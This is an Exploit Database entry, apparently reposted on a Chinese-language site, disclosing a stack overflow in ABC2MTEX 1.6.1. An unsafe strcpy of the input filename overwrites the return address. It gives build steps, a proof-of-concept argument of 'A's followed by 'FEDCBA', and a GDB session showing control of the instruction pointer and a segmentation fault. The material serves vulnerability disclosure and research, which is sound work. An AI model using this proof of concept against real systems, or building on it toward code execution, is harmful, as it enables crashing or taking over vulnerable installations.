ABC2MTEX 1.6.1 – Command Line Stack Overflow

• Exploit Database
• 12 阅读

• 作者： Carter Yagemann
  日期： 2019-08-14
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/47254/

• Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
  Date: 2019-08-13
  Exploit Author: Carter Yagemann <yagemann@gatech.edu>
  Vendor Homepage: https://abcnotation.com/abc2mtex/
  Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
  Version: 1.6.1
  Tested on: Debian Buster
  
  An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
  address from the openIn function by providing a long input filename. This
  carries similar risk to CVE-2004-1257.
  
  Setup:
  
  $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
  $ tar -xzf abc2mtex1.6.1.tar.gz
  $ make
  
  $ gcc --version
  gcc (Debian 8.3.0-6) 8.3.0
  Copyright (C) 2018 Free Software Foundation, Inc.
  This is free software; see the source for copying conditions.There is NO
  warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  
  PoC:
  
  $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
  
  GDB:
  
  We're going to place a breakpoint before and after abc.c:241 to show the overflow.
  
  $ gdb -q ./abc2mtex
  Reading symbols from ./abc2mtex...done.
  (gdb) break abc.c:241
  Breakpoint 1 at 0x4139: file abc.c, line 241.
  (gdb) break abc.c:242
  Breakpoint 2 at 0x414c: file abc.c, line 242.
  (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
  Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
  
  Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
  241 (void) strcpy(savename,filename);
  (gdb) bt
  #0openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
  #10x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
  (gdb) c
  Continuing.
  
  Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
  242 (void) strcat(filename,".abc");
  (gdb) bt
  #0openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
  #10x0000414243444546 in ?? ()
  #20x00007fffffffe4f8 in ?? ()
  #30x0000000200000000 in ?? ()
  #40x0000000000000000 in ?? ()
  (gdb) c
  Continuing.
  file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
  
  Program received signal SIGSEGV, Segmentation fault.
  0x0000414243444546 in ?? ()
  (gdb) quit